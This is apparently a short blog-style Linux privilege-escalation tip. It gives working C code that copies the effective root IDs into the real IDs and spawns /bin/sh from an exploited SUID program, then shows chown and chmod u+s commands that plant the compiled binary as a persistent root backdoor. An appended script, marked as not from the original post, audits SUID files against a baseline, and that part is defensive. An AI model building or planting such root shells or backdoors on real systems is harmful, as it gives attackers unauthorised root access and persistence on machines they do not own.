Many SUID root Linux programs drop their root privileges when running, so exploiting them can result in a shell which apparently only has the same privileges as the user. This is frequently seen when exploiting a call to the system() function. Restoring those privileges is a simple case of calling a library function: setuid().
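To help with this, you can use the following C code:

#include <unistd.h>
#include <stdio.h>

int main(int argc, char *argv[])
{
    printf("Please enjoy this complimentary shell:\n");

    /* Copy the effective IDs into the real (and saved) IDs so the
       shell started below does not see a real/effective mismatch. */
    setuid(geteuid());
    setgid(getegid());

    execl("/bin/sh", "sh", NULL);

    /* Only reached if execl() failed. */
    perror("execl");
    return 1;
}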
Compile with GCC:
gcc restore.c -o elevatedshell
And then get your exploit to run the program.
If you manage to find a way to arbitrarily set the owner of a file to root and enable the SUID bit, this file can also be used as a backdoor:
chown root:root elevatedshell && chmod u+s elevatedshell
You can’t do this with an interpreted bash script: Linux will simply ignore the SUID bit on interpreted scripts such as .sh files, but it does work with compiled programs.
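
A root-owned SUID binary created with chown and chmod u+s, as above, shows up as a new entry when the SUID files on a system are compared against a reviewed list. The following shell functions are an added example, not code from the original post; the function names and the baseline file (one absolute path per line) are assumptions.

```shell
#!/bin/sh
# Added example: report SUID files owned by a given user that are missing
# from a reviewed baseline. Function names and the baseline format
# (one absolute path per line) are assumptions made for this sketch.

# list_suid DIR [OWNER]
# Print every regular file under DIR that has the SUID bit set and is
# owned by OWNER (user name or numeric uid, default root), sorted.
list_suid() {
    dir=$1
    owner=${2:-root}
    # -xdev keeps the scan on one filesystem; -perm -4000 matches SUID.
    find "$dir" -xdev -type f -perm -4000 -user "$owner" 2>/dev/null |
        LC_ALL=C sort
}

# unexpected_suid DIR BASELINE [OWNER]
# Print the SUID files that are not listed in BASELINE.
unexpected_suid() {
    dir=$1
    baseline=$2
    owner=${3:-root}
    # The baseline is loaded in BEGIN so an empty baseline still works:
    # every SUID file found is then reported.
    list_suid "$dir" "$owner" |
        awk -v base="$baseline" '
            BEGIN { while ((getline line < base) > 0) ok[line] = 1 }
            !($0 in ok)'
}

# Stand-alone use: sh suid_audit.sh --scan DIR BASELINE [OWNER]
# (suid_audit.sh is a hypothetical file name.)
if [ "${1:-}" = "--scan" ]; then
    unexpected_suid "$2" "$3" "${4:-root}" | while IFS= read -r f; do
        # Show owner, mode and timestamp for triage.
        ls -ln "$f"
    done
fi
```

The baseline is only useful if it is built from a known-good state and stored where an unprivileged user cannot edit it.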